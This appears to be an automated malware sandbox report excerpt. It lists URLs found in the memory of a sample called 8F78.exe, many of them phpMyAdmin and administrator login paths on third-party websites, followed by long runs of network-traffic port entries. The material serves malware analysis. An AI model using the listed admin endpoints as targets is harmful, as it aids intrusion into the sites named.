                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003EC5000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3658884615.0000000003A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/phpmyadmin/P/
                                Source: 8F78.exe, 00000007.00000002.3743164281.00000000040E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/phpmyadmin/f
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/privacy_policy/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/sakuhin_syu/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/shinro/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/shinro/saiyoutantou/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/shinro/sotsugyousei_no_koe/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/site_map/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/tyanto_kyoushitsu/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/themes/crieinc1.0/bs/css/bootstrap.min.css
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/themes/crieinc1.0/bs/js/bootstrap.min.js
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/themes/crieinc1.0/js/css3-mediaqueries.js
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/themes/crieinc1.0/js/html5.js
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/themes/crieinc1.0/js/jquery1.4.4.min.js
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/themes/crieinc1.0/js/script.js
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/themes/crieinc1.0/style.css
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/uploads/2017/06/hed_gakoukengakukai.png
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/uploads/2017/06/hed_otoiawase.png
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/uploads/2017/06/hed_shiryouseikyu.png
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/uploads/2018/05/0514_bana_03.jpg
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/uploads/2020/05/hed_ico_ins.png
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-content/uploads/2020/05/hed_ico_tw.png
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-includes/css/dist/block-library/style.min.css?ver=6.3.2
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.3.2
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/wp-json/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nakacho.com/xmlrpc.php?rsd
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004224000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nippondotech.co.jp/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3647175273.0000000003854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oitacity.jp/phpmyadmin/
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://preda.pl/administrator/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://r-shingaku.com/ce/form/160/input
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roland-sk.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roland-sk.sk/phpmyadmin/22
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rotas.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rotas.sk/phpmyadmin/C
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003CE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rotas.sk/phpmyadmin/e
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003EC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s-kotobuki-s.co.jp/administrator/
                                Source: 8F78.exe, 00000007.00000003.2053867641.0000000003517000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000003.2053478299.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000003.2058533525.00000000037DF000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3571007090.0000000002970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DE1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003F87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=14460&amp;language=us&amp;domain=tsutomu.com&amp;origin=p
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DE1000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003F87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=14460&language=us&domain=tsutomu.com&origin=parking&utm_m
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3754866218.0000000004200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themeisle.com
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/nakacho_mito
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                                Source: explorer.exe, 00000001.00000000.1702956884.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.certum.pl/CPS0
                                Source: 8F78.exe, 00000007.00000002.3640005281.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2025907926.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026608376.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2027233927.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026473695.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2026051969.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028689956.00000208D2DED000.00000004.00000020.00020000.00000000.sdmp, A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                Source: 8F78.exe, 00000007.00000002.3648319405.00000000038AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.elektrospol.sk/phpmyadmin/
                                Source: 8F78.exe, 00000007.00000002.3672655759.0000000003C97000.00000004.00000020.00020000.00000000.sdmp, 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NKSZ8XJ
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-TSZPQP8
                                Source: 8F78.exe, 00000007.00000002.3640005281.00000000036E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=hokal.com
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.instagram.com/nakacho_mito/
                                Source: 8F78.exe, 00000007.00000002.3754866218.0000000004238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.kingsway-hk.com/phpmyadmin
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                                Source: explorer.exe, 00000001.00000000.1699278229.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                                Source: A19A.exe, 00000008.00000003.2028015077.00000208D2DED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                                Source: explorer.exe, 00000001.00000000.1699278229.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
                                Source: 8F78.exe, 00000007.00000002.3685374127.0000000003F87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/
                                Source: 8F78.exe, 00000007.00000002.3523875772.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/documentation.html
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51702
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50974
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51705
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54412
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51384
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54416
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54657
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50973
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50972
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52960 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54661
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54782
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50623
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52802
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52807
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52804
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54664
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53574
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50980
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53557 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53832 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54427
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50984
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54667
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53577
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53826 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53793 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54793
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50973 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52804 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51725 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54670
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52810 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54905 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53809 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50904 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52813
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53025 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53300 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55688 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51725
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51056 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51722
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54318
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50980 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54259 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51486 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55802 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54794
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52810
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54448 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51290
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55770
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54120 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50974 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51292
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53041 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55773 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51056
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51055
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53595
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54442
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55531
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54448
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54446
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50623 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51702 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52879 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54607 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54452
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54412 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54471 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53287 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50931
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50935
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54670 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54664 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55700
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55942
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55822
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55943
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55944
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54372 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52797
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53797 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51512 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51292 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54793 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50943
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50931 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53997 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50914 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51472
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50940
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55944 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51813 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55531 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50957
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51486
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53300
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54513
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53792 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53577 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54113 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51813
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50446 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51055 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55801 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53793
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53557
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53797
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54416 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53560
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52802 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50608
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52879
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54427 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54513 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53595 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54244 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54377
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53287
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54462 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52873
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54318 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54259
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54382
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52807 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54382 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55596
                                Source: unknownNetwork traffic detected: HTTP traffic on port 51705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54262
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54383
                                Source: unknownNetwork traffic detected: HTTP traffic on port 52813 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54262 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 55771 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50935 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50904
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54267
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51432
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53796 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 53039 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54657 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54794 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50905
                                Source: unknownNetwork traffic detected: HTTP traffic on port 54364 -> 443
